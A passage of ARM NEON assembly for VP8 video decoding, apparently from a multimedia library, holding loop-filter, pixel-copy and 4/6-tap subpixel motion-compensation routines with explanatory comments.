transpose_8x8 q0, q1, q2, q3, q4, q5, q6, q7 @ rows -> P3..Q3
vdup.8 q14, r3 @ flim_E
vdup.8 q15, r12 @ flim_I
ldr r12, [sp, #68] @ hev_thresh
vp8_loop_filter inner=\inner
sub r0, r0, r2, lsl #3 @ backup u 8 rows
sub r1, r1, r2, lsl #3 @ backup v 8 rows
transpose_8x8 q0, q1, q2, q3, q4, q5, q6, q7 @ back to row order
@ Store pixels:
vst1.8 {d0}, [r0], r2
vst1.8 {d1}, [r1], r2
vst1.8 {d2}, [r0], r2
vst1.8 {d3}, [r1], r2
vst1.8 {d4}, [r0], r2
vst1.8 {d5}, [r1], r2
vst1.8 {d6}, [r0], r2
vst1.8 {d7}, [r1], r2
vst1.8 {d8}, [r0], r2
vst1.8 {d9}, [r1], r2
vst1.8 {d10}, [r0], r2
vst1.8 {d11}, [r1], r2
vst1.8 {d12}, [r0], r2
vst1.8 {d13}, [r1], r2
vst1.8 {d14}, [r0]
vst1.8 {d15}, [r1]
vpop {q4-q7}
bx lr
endfunc
.endm
@ Instantiate the chroma horizontal filter variants.
vp8_h_loop_filter8uv
vp8_h_loop_filter8uv _inner, inner=1
@ Plain 16x h copy: dst(r0, stride r1) <- src(r2, stride r3), h rows,
@ h taken from the stack; processes four rows per iteration.
@ Uses only caller-saved NEON registers (q8-q11).
function ff_put_vp8_pixels16_neon, export=1
        ldr             r12, [sp]               @ h
1:
        vld1.8          {q8},  [r2], r3         @ fetch 4 source rows
        vld1.8          {q9},  [r2], r3
        vld1.8          {q10}, [r2], r3
        vld1.8          {q11}, [r2], r3
        subs            r12, r12, #4            @ 4 rows consumed
        vst1.8          {q8},  [r0,:128], r1    @ write them out
        vst1.8          {q9},  [r0,:128], r1
        vst1.8          {q10}, [r0,:128], r1
        vst1.8          {q11}, [r0,:128], r1
        bgt             1b
        bx              lr
endfunc
@ Plain 8x h copy: dst(r0, stride r1) <- src(r2, stride r3), h rows,
@ h taken from the stack; processes four rows per iteration.
@ Uses only caller-saved NEON registers (d16-d19).
function ff_put_vp8_pixels8_neon, export=1
        ldr             r12, [sp]               @ h
1:
        vld1.8          {d16}, [r2], r3         @ fetch 4 source rows
        vld1.8          {d17}, [r2], r3
        vld1.8          {d18}, [r2], r3
        vld1.8          {d19}, [r2], r3
        subs            r12, r12, #4            @ 4 rows consumed
        vst1.8          {d16}, [r0,:64], r1     @ write them out
        vst1.8          {d17}, [r0,:64], r1
        vst1.8          {d18}, [r0,:64], r1
        vst1.8          {d19}, [r0,:64], r1
        bgt             1b
        bx              lr
endfunc
/* 4/6-tap 8th-pel MC */
@ Horizontal 6-tap filter over 8 output pixels.
@ \a:\b hold 13 consecutive source bytes (src[-2]..src[10]); the filter
@ coefficients are in d0/d1 (loaded from subpel_filters, so taps 0,1,4,5
@ are subtracted via vmls and taps 2,3 added via vmla/vmul).
@ Result, rounded and narrowed with #7 shift, lands in \d.
.macro vp8_epel8_h6 d, a, b
vext.8 d27, \a, \b, #1 @ src[-1]
vmovl.u8 q8, \a
vext.8 d28, \a, \b, #2 @ src[ 0]
vmovl.u8 q9, d27
vext.8 d29, \a, \b, #3 @ src[ 1]
vmovl.u8 q10, d28
vext.8 d30, \a, \b, #4 @ src[ 2]
vmovl.u8 q11, d29
vext.8 d31, \a, \b, #5 @ src[ 3]
vmovl.u8 q12, d30
vmul.u16 q10, q10, d0[2] @ + src[ 0] * F[2]
vmovl.u8 q13, d31
vmul.u16 q11, q11, d0[3] @ + src[ 1] * F[3]
vmls.u16 q10, q9, d0[1] @ - src[-1] * F[1]
vmls.u16 q11, q12, d1[0] @ - src[ 2] * F[4]
vmla.u16 q10, q8, d0[0] @ + src[-2] * F[0]
vmla.u16 q11, q13, d1[1] @ + src[ 3] * F[5]
vqadd.s16 q11, q10, q11
vqrshrun.s16 \d, q11, #7 @ round, shift and clip to u8
.endm
@ Horizontal 6-tap filter over 16 output pixels (two 8-wide halves).
@ \q0:\q1 hold 21 consecutive source bytes; \s0/\s1 are the first two
@ d registers of that span. Coefficients in d0/d1 as for vp8_epel8_h6.
@ Results go to \d0 (low 8 pixels) and \d1 (high 8 pixels).
.macro vp8_epel16_h6 d0, d1, s0, s1, s2, q0, q1
vext.8 q14, \q0, \q1, #3 @ src[ 1]
vext.8 q15, \q0, \q1, #4 @ src[ 2]
vmovl.u8 q11, d28
vmovl.u8 q14, d29
vext.8 q3, \q0, \q1, #2 @ src[ 0]
vmovl.u8 q12, d30
vmovl.u8 q15, d31
vext.8 q8, \q0, \q1, #1 @ src[-1]
vmovl.u8 q10, d6
vmovl.u8 q3, d7
vext.8 q2, \q0, \q1, #5 @ src[ 3]
vmovl.u8 q13, d4
vmovl.u8 q2, d5
vmovl.u8 q9, d16
vmovl.u8 q8, d17
vmul.u16 q11, q11, d0[3] @ + src[ 1] * F[3]
vmul.u16 q10, q10, d0[2] @ + src[ 0] * F[2]
vmul.u16 q3, q3, d0[2]
vmul.u16 q14, q14, d0[3]
vmls.u16 q11, q12, d1[0] @ - src[ 2] * F[4]
vmovl.u8 q12, \s0
vmovl.u8 q1, \s1
vmls.u16 q10, q9, d0[1] @ - src[-1] * F[1]
vmls.u16 q3, q8, d0[1]
vmls.u16 q14, q15, d1[0]
vmla.u16 q10, q12, d0[0] @ + src[-2] * F[0]
vmla.u16 q11, q13, d1[1] @ + src[ 3] * F[5]
vmla.u16 q3, q1, d0[0]
vmla.u16 q14, q2, d1[1]
vqadd.s16 q11, q10, q11
vqadd.s16 q14, q3, q14
vqrshrun.s16 \d0, q11, #7 @ round, shift and clip to u8
vqrshrun.s16 \d1, q14, #7
.endm
@ Vertical 6-tap filter producing one 8-pixel row.
@ \s0..\s5 are six consecutive source rows (8 bytes each); coefficients
@ in d0/d1 as for vp8_epel8_h6. Result (rounded, #7 shift) in \d0.
.macro vp8_epel8_v6 d0, s0, s1, s2, s3, s4, s5
vmovl.u8 q10, \s2
vmovl.u8 q11, \s3
vmovl.u8 q9, \s1
vmovl.u8 q12, \s4
vmovl.u8 q8, \s0
vmovl.u8 q13, \s5
vmul.u16 q10, q10, d0[2] @ + row[ 0] * F[2]
vmul.u16 q11, q11, d0[3] @ + row[ 1] * F[3]
vmls.u16 q10, q9, d0[1] @ - row[-1] * F[1]
vmls.u16 q11, q12, d1[0] @ - row[ 2] * F[4]
vmla.u16 q10, q8, d0[0] @ + row[-2] * F[0]
vmla.u16 q11, q13, d1[1] @ + row[ 3] * F[5]
vqadd.s16 q11, q10, q11
vqrshrun.s16 \d0, q11, #7 @ round, shift and clip to u8
.endm
@ Vertical 6-tap filter producing TWO 8-pixel rows at once.
@ \s0..\s6 are seven consecutive source rows; \d0 gets the row filtered
@ from \s0..\s5 and \d1 the row filtered from \s1..\s6 (the two taps
@ sets are interleaved so each widened row is reused for both outputs).
.macro vp8_epel8_v6_y2 d0, d1, s0, s1, s2, s3, s4, s5, s6
vmovl.u8 q10, \s0
vmovl.u8 q11, \s3
vmovl.u8 q14, \s6
vmovl.u8 q9, \s1
vmovl.u8 q12, \s4
vmovl.u8 q8, \s2
vmovl.u8 q13, \s5
vmul.u16 q10, q10, d0[0] @ row 0: + s0 * F[0]
vmul.u16 q15, q11, d0[3] @ row 1: + s3 * F[3]
vmul.u16 q11, q11, d0[2] @ row 0: + s3 * F[3] (s3 is tap 3 of row 0)
vmul.u16 q14, q14, d1[1] @ row 1: + s6 * F[5]
vmls.u16 q10, q9, d0[1] @ row 0: - s1 * F[1]
vmls.u16 q15, q12, d1[0] @ row 1: - s4 * F[4]
vmls.u16 q11, q8, d0[1] @ row 1 partial: - s2 * F[1]
vmls.u16 q14, q13, d1[0] @ row 1: - s5 (second half)
vmla.u16 q10, q8, d0[2] @ row 0: + s2 * F[2]
vmla.u16 q15, q13, d1[1]
vmla.u16 q11, q9, d0[0]
vmla.u16 q14, q12, d0[3]
vqadd.s16 q15, q10, q15
vqadd.s16 q14, q11, q14
vqrshrun.s16 \d0, q15, #7 @ round, shift and clip both rows
vqrshrun.s16 \d1, q14, #7
.endm
@ Horizontal 4-tap filter over 8 output pixels.
@ \a:\b hold 11 consecutive source bytes (src[-1]..src[9]); uses only
@ the middle four coefficients (F[1]..F[4]) of the filter in d0/d1.
.macro vp8_epel8_h4 d, a, b
vext.8 d28, \a, \b, #1 @ src[ 0]
vmovl.u8 q9, \a
vext.8 d29, \a, \b, #2 @ src[ 1]
vmovl.u8 q10, d28
vext.8 d30, \a, \b, #3 @ src[ 2]
vmovl.u8 q11, d29
vmovl.u8 q12, d30
vmul.u16 q10, q10, d0[2] @ + src[ 0] * F[2]
vmul.u16 q11, q11, d0[3] @ + src[ 1] * F[3]
vmls.u16 q10, q9, d0[1] @ - src[-1] * F[1]
vmls.u16 q11, q12, d1[0] @ - src[ 2] * F[4]
vqadd.s16 q11, q10, q11
vqrshrun.s16 \d, q11, #7 @ round, shift and clip to u8
.endm
@ Vertical 4-tap filter producing TWO 8-pixel rows at once.
@ \s0..\s4 are five consecutive source rows; \d0 gets the row filtered
@ from \s0..\s3 and \d1 the row filtered from \s1..\s4.
.macro vp8_epel8_v4_y2 d0, d1, s0, s1, s2, s3, s4
vmovl.u8 q9, \s0
vmovl.u8 q10, \s1
vmovl.u8 q11, \s2
vmovl.u8 q12, \s3
vmovl.u8 q13, \s4
vmul.u16 q8, q10, d0[2] @ row 0: + s1 * F[2]
vmul.u16 q14, q11, d0[3] @ row 0: + s2 * F[3]
vmul.u16 q11, q11, d0[2] @ row 1: + s2 * F[2]
vmul.u16 q15, q12, d0[3] @ row 1: + s3 * F[3]
vmls.u16 q8, q9, d0[1] @ row 0: - s0 * F[1]
vmls.u16 q14, q12, d1[0] @ row 0: - s3 * F[4]
vmls.u16 q11, q10, d0[1] @ row 1: - s1 * F[1]
vmls.u16 q15, q13, d1[0] @ row 1: - s4 * F[4]
vqadd.s16 q8, q8, q14
vqadd.s16 q11, q11, q15
vqrshrun.s16 \d0, q8, #7 @ round, shift and clip both rows
vqrshrun.s16 \d1, q11, #7
.endm
@ 16-wide vertical 6-tap subpel MC.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and my are read from the stack (offsets per the ldr comments).
@ The filter row is selected from subpel_filters by my (16 bytes each).
function ff_put_vp8_epel16_v6_neon, export=1
sub r2, r2, r3, lsl #1 @ src -= 2 rows (filter reach)
push {r4,lr}
vpush {d8-d15}
ldr r4, [sp, #80] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #72] @ h
add r4, lr, r4, lsl #4 @ &subpel_filters[my-1]
vld1.16 {q0}, [r4,:128] @ filter coefficients -> q0
1:
@ load the 7 source rows needed for 2 output rows
vld1.8 {d2-d3}, [r2], r3
vld1.8 {d4-d5}, [r2], r3
vld1.8 {d6-d7}, [r2], r3
vld1.8 {d8-d9}, [r2], r3
vld1.8 {d10-d11},[r2], r3
vld1.8 {d12-d13},[r2], r3
vld1.8 {d14-d15},[r2]
sub r2, r2, r3, lsl #2 @ rewind src: next pair overlaps 5 rows
vp8_epel8_v6_y2 d2, d4, d2, d4, d6, d8, d10, d12, d14
vp8_epel8_v6_y2 d3, d5, d3, d5, d7, d9, d11, d13, d15
vst1.8 {d2-d3}, [r0,:128], r1
vst1.8 {d4-d5}, [r0,:128], r1
subs r12, r12, #2 @ two rows per iteration
bne 1b
vpop {d8-d15}
pop {r4,pc}
endfunc
@ 16-wide horizontal 6-tap subpel MC.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and mx on the stack (offsets per the ldr comments).
function ff_put_vp8_epel16_h6_neon, export=1
sub r2, r2, #2 @ src -= 2 (filter reach)
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4 @ &subpel_filters[mx-1]
vld1.16 {q0}, [r4,:128] @ filter coefficients -> q0
1:
vld1.8 {d2-d4}, [r2], r3 @ 21 bytes of source
vp8_epel16_h6 d2, d3, d2, d3, d4, q1, q2
vst1.8 {d2-d3}, [r0,:128], r1
subs r12, r12, #1
bne 1b
pop {r4,pc}
endfunc
@ 16-wide 2D (horizontal 6-tap then vertical 6-tap) subpel MC.
@ Pass 1 filters h+5 rows horizontally into a 16-byte-aligned
@ scratch buffer on the stack; pass 2 filters that buffer vertically
@ into dst. Stack args: h, mx, my (offsets per the ldr comments).
function ff_put_vp8_epel16_h6v6_neon, export=1
sub r2, r2, r3, lsl #1 @ src -= 2 rows + 2 cols
sub r2, r2, #2
push {r4,lr}
vpush {d8-d9}
@ first pass (horizontal):
ldr r4, [sp, #28] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #24] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #336+16 @ scratch: (h+5)*16 max + align slack
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #5 @ h+5 intermediate rows
bic lr, lr, #15 @ 16-align scratch pointer
1:
vld1.8 {d2,d3,d4}, [r2], r3
vp8_epel16_h6 d2, d3, d2, d3, d4, q1, q2
vst1.8 {d2-d3}, [lr,:128]!
subs r12, r12, #1
bne 1b
@ second pass (vertical):
ldr r4, [sp, #336+16+32] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #336+16+24] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15 @ rewound, re-aligned scratch
2:
vld1.8 {d2-d5}, [lr,:128]! @ 6 intermediate rows
vld1.8 {d6-d9}, [lr,:128]!
vld1.8 {d28-d31},[lr,:128]
sub lr, lr, #48 @ advance scratch by one row only
vp8_epel8_v6 d2, d2, d4, d6, d8, d28, d30
vp8_epel8_v6 d3, d3, d5, d7, d9, d29, d31
vst1.8 {d2-d3}, [r0,:128], r1
subs r12, r12, #1
bne 2b
add sp, sp, #336+16 @ release scratch
vpop {d8-d9}
pop {r4,pc}
endfunc
@ 8-wide vertical 6-tap subpel MC; two output rows per iteration.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and my on the stack (offsets per the ldr comments).
function ff_put_vp8_epel8_v6_neon, export=1
sub r2, r2, r3, lsl #1 @ src -= 2 rows (filter reach)
push {r4,lr}
ldr r4, [sp, #16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128] @ filter coefficients -> q0
1:
vld1.8 {d2}, [r2], r3 @ 7 rows feed 2 output rows
vld1.8 {d3}, [r2], r3
vld1.8 {d4}, [r2], r3
vld1.8 {d5}, [r2], r3
vld1.8 {d6}, [r2], r3
vld1.8 {d7}, [r2], r3
vld1.8 {d28}, [r2]
sub r2, r2, r3, lsl #2 @ rewind: next pair overlaps 5 rows
vp8_epel8_v6_y2 d2, d3, d2, d3, d4, d5, d6, d7, d28
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 1b
pop {r4,pc}
endfunc
@ 8-wide horizontal 6-tap subpel MC.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and mx on the stack (offsets per the ldr comments).
function ff_put_vp8_epel8_h6_neon, export=1
sub r2, r2, #2 @ src -= 2 (filter reach)
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128] @ filter coefficients -> q0
1:
vld1.8 {d2,d3}, [r2], r3 @ 13 bytes of source needed
vp8_epel8_h6 d2, d2, d3
vst1.8 {d2}, [r0,:64], r1
subs r12, r12, #1
bne 1b
pop {r4,pc}
endfunc
@ 8-wide 2D (horizontal 6-tap then vertical 6-tap) subpel MC.
@ Pass 1 writes h+5 filtered rows to an aligned stack scratch buffer;
@ pass 2 filters it vertically, two rows per iteration.
@ Stack args: h, mx, my (offsets per the ldr comments).
function ff_put_vp8_epel8_h6v6_neon, export=1
sub r2, r2, r3, lsl #1 @ src -= 2 rows + 2 cols
sub r2, r2, #2
push {r4,lr}
@ first pass (horizontal):
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #168+16 @ scratch: (h+5)*8 max + align slack
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #5 @ h+5 intermediate rows
bic lr, lr, #15 @ 16-align scratch pointer
1:
vld1.8 {d2,d3}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.8 {d2}, [lr,:64]!
subs r12, r12, #1
bne 1b
@ second pass (vertical):
ldr r4, [sp, #168+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #168+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15 @ rewound, re-aligned scratch
2:
vld1.8 {d2-d5}, [lr,:128]! @ 7 intermediate rows
vld1.8 {d6-d7}, [lr,:128]!
vld1.8 {d30}, [lr,:64]
sub lr, lr, #32 @ advance scratch by two rows
vp8_epel8_v6_y2 d2, d3, d2, d3, d4, d5, d6, d7, d30
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 2b
add sp, sp, #168+16 @ release scratch
pop {r4,pc}
endfunc
@ 8-wide vertical 4-tap subpel MC; two output rows per iteration.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and my on the stack (offsets per the ldr comments).
function ff_put_vp8_epel8_v4_neon, export=1
sub r2, r2, r3 @ src -= 1 row (4-tap reach)
push {r4,lr}
ldr r4, [sp, #16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128] @ filter coefficients -> q0
1:
vld1.8 {d2}, [r2], r3 @ 5 rows feed 2 output rows
vld1.8 {d3}, [r2], r3
vld1.8 {d4}, [r2], r3
vld1.8 {d5}, [r2], r3
vld1.8 {d6}, [r2]
sub r2, r2, r3, lsl #1 @ rewind: next pair overlaps 3 rows
vp8_epel8_v4_y2 d2, d3, d2, d3, d4, d5, d6
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 1b
pop {r4,pc}
endfunc
@ 8-wide horizontal 4-tap subpel MC.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and mx on the stack (offsets per the ldr comments).
function ff_put_vp8_epel8_h4_neon, export=1
sub r2, r2, #1 @ src -= 1 (4-tap reach)
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128] @ filter coefficients -> q0
1:
vld1.8 {d2,d3}, [r2], r3 @ 11 bytes of source needed
vp8_epel8_h4 d2, d2, d3
vst1.8 {d2}, [r0,:64], r1
subs r12, r12, #1
bne 1b
pop {r4,pc}
endfunc
@ 8-wide 2D (horizontal 4-tap then vertical 4-tap) subpel MC.
@ Pass 1 writes h+3 filtered rows to an aligned stack scratch buffer;
@ pass 2 filters it vertically, two rows per iteration.
@ Stack args: h, mx, my (offsets per the ldr comments).
function ff_put_vp8_epel8_h4v4_neon, export=1
sub r2, r2, r3 @ src -= 1 row + 1 col
sub r2, r2, #1
push {r4,lr}
@ first pass (horizontal):
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #168+16 @ scratch + align slack
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #3 @ h+3 intermediate rows
bic lr, lr, #15 @ 16-align scratch pointer
1:
vld1.8 {d2,d3}, [r2], r3
vp8_epel8_h4 d2, d2, d3
vst1.8 {d2}, [lr,:64]!
subs r12, r12, #1
bne 1b
@ second pass (vertical):
ldr r4, [sp, #168+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #168+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15 @ rewound, re-aligned scratch
2:
vld1.8 {d2-d5}, [lr,:128]! @ 5 intermediate rows
vld1.8 {d6}, [lr,:64]
sub lr, lr, #16 @ advance scratch by two rows
vp8_epel8_v4_y2 d2, d3, d2, d3, d4, d5, d6
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 2b
add sp, sp, #168+16 @ release scratch
pop {r4,pc}
endfunc
@ 8-wide 2D MC: horizontal 6-tap first pass, vertical 4-tap second.
@ Pass 1 writes h+3 filtered rows to an aligned stack scratch buffer;
@ pass 2 filters it vertically, two rows per iteration.
@ Stack args: h, mx, my (offsets per the ldr comments).
function ff_put_vp8_epel8_h6v4_neon, export=1
sub r2, r2, r3 @ src -= 1 row + 2 cols
sub r2, r2, #2
push {r4,lr}
@ first pass (horizontal):
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #168+16 @ scratch + align slack
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #3 @ h+3 intermediate rows
bic lr, lr, #15 @ 16-align scratch pointer
1:
vld1.8 {d2,d3}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.8 {d2}, [lr,:64]!
subs r12, r12, #1
bne 1b
@ second pass (vertical):
ldr r4, [sp, #168+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #168+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15 @ rewound, re-aligned scratch
2:
vld1.8 {d2-d5}, [lr,:128]! @ 5 intermediate rows
vld1.8 {d6}, [lr,:64]
sub lr, lr, #16 @ advance scratch by two rows
vp8_epel8_v4_y2 d2, d3, d2, d3, d4, d5, d6
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 2b
add sp, sp, #168+16 @ release scratch
pop {r4,pc}
endfunc
@ 8-wide 2D MC: horizontal 4-tap first pass, vertical 6-tap second.
@ Pass 1 writes h+5 filtered rows to an aligned stack scratch buffer;
@ pass 2 filters it vertically, two rows per iteration.
@ Stack args: h, mx, my (offsets per the ldr comments).
function ff_put_vp8_epel8_h4v6_neon, export=1
sub r2, r2, r3, lsl #1 @ src -= 2 rows + 1 col
sub r2, r2, #1
push {r4,lr}
@ first pass (horizontal):
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #168+16 @ scratch + align slack
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #5 @ h+5 intermediate rows
bic lr, lr, #15 @ 16-align scratch pointer
1:
vld1.8 {d2,d3}, [r2], r3
vp8_epel8_h4 d2, d2, d3
vst1.8 {d2}, [lr,:64]!
subs r12, r12, #1
bne 1b
@ second pass (vertical):
ldr r4, [sp, #168+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #168+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15 @ rewound, re-aligned scratch
2:
vld1.8 {d2-d5}, [lr,:128]! @ 7 intermediate rows
vld1.8 {d6-d7}, [lr,:128]!
vld1.8 {d30}, [lr,:64]
sub lr, lr, #32 @ advance scratch by two rows
vp8_epel8_v6_y2 d2, d3, d2, d3, d4, d5, d6, d7, d30
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 2b
add sp, sp, #168+16 @ release scratch
pop {r4,pc}
endfunc
.ltorg
@ 4-wide vertical 6-tap subpel MC; four output rows per iteration by
@ packing two 4-pixel rows into each d register lane pair.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and my on the stack (offsets per the ldr comments).
function ff_put_vp8_epel4_v6_neon, export=1
sub r2, r2, r3, lsl #1 @ src -= 2 rows (filter reach)
push {r4,lr}
ldr r4, [sp, #16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128] @ filter coefficients -> q0
1:
vld1.32 {d2[]}, [r2], r3 @ rows 0..6 into lane 0
vld1.32 {d3[]}, [r2], r3
vld1.32 {d4[]}, [r2], r3
vld1.32 {d5[]}, [r2], r3
vld1.32 {d6[]}, [r2], r3
vld1.32 {d7[]}, [r2], r3
vld1.32 {d28[]}, [r2]
sub r2, r2, r3, lsl #2 @ rewind to row 2
vld1.32 {d2[1]}, [r2], r3 @ rows 2..8 into lane 1
vld1.32 {d3[1]}, [r2], r3
vld1.32 {d4[1]}, [r2], r3
vld1.32 {d5[1]}, [r2], r3
vld1.32 {d6[1]}, [r2], r3
vld1.32 {d7[1]}, [r2], r3
vld1.32 {d28[1]}, [r2]
sub r2, r2, r3, lsl #2
vp8_epel8_v6_y2 d2, d3, d2, d3, d4, d5, d6, d7, d28
vst1.32 {d2[0]}, [r0,:32], r1 @ unpack the 4 result rows
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 1b
pop {r4,pc}
endfunc
@ 4-wide horizontal 6-tap subpel MC (uses the 8-wide filter, stores
@ only the low 4 pixels).
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and mx on the stack (offsets per the ldr comments).
function ff_put_vp8_epel4_h6_neon, export=1
sub r2, r2, #2 @ src -= 2 (filter reach)
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128] @ filter coefficients -> q0
1:
vld1.8 {q1}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.32 {d2[0]}, [r0,:32], r1 @ store low 4 pixels only
subs r12, r12, #1
bne 1b
pop {r4,pc}
endfunc
@ 4-wide 2D (horizontal 6-tap then vertical 6-tap) subpel MC.
@ Pass 1 stores h+5 4-byte rows into a stack scratch buffer; pass 2
@ loads two interleaved row sets, transposes them into lane pairs and
@ filters 4 output rows per iteration.
@ Stack args: h, mx, my (offsets per the ldr comments).
function ff_put_vp8_epel4_h6v6_neon, export=1
sub r2, r2, r3, lsl #1 @ src -= 2 rows + 2 cols
sub r2, r2, #2
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #52+16 @ scratch: (h+5)*4 max + align slack
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #5 @ h+5 intermediate rows
bic lr, lr, #15 @ 16-align scratch pointer
1:
vld1.8 {q1}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.32 {d2[0]}, [lr,:32]!
subs r12, r12, #1
bne 1b
ldr r4, [sp, #52+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #52+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15 @ rewound, re-aligned scratch
2:
vld1.8 {d2-d3}, [lr,:128]! @ rows 0..6 (first set)
vld1.8 {d6}, [lr,:64]!
vld1.32 {d28[]}, [lr,:32]
sub lr, lr, #16 @ back up to row 4
vld1.8 {d4-d5}, [lr]! @ rows 4..10 (second set)
vld1.8 {d7}, [lr,:64]!
vld1.32 {d28[1]}, [lr,:32]
sub lr, lr, #16 @ advance scratch by 4 rows
vtrn.32 q1, q2 @ interleave the two row sets
vtrn.32 d6, d7
vp8_epel8_v6_y2 d2, d3, d2, d4, d3, d5, d6, d7, d28
vst1.32 {d2[0]}, [r0,:32], r1 @ unpack the 4 result rows
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 2b
add sp, sp, #52+16 @ release scratch
pop {r4,pc}
endfunc
@ 4-wide 2D MC: horizontal 4-tap first pass, vertical 6-tap second.
@ Same scratch-buffer / transpose scheme as ff_put_vp8_epel4_h6v6_neon.
@ Stack args: h, mx, my (offsets per the ldr comments).
function ff_put_vp8_epel4_h4v6_neon, export=1
sub r2, r2, r3, lsl #1 @ src -= 2 rows + 1 col
sub r2, r2, #1
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #52+16 @ scratch + align slack
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #5 @ h+5 intermediate rows
bic lr, lr, #15 @ 16-align scratch pointer
1:
vld1.8 {d2}, [r2], r3
vp8_epel8_h4 d2, d2, d2
vst1.32 {d2[0]}, [lr,:32]!
subs r12, r12, #1
bne 1b
ldr r4, [sp, #52+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #52+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15 @ rewound, re-aligned scratch
2:
vld1.8 {d2-d3}, [lr,:128]! @ rows 0..6 (first set)
vld1.8 {d6}, [lr,:64]!
vld1.32 {d28[]}, [lr,:32]
sub lr, lr, #16 @ back up to row 4
vld1.8 {d4-d5}, [lr]! @ rows 4..10 (second set)
vld1.8 {d7}, [lr,:64]!
vld1.32 {d28[1]}, [lr,:32]
sub lr, lr, #16 @ advance scratch by 4 rows
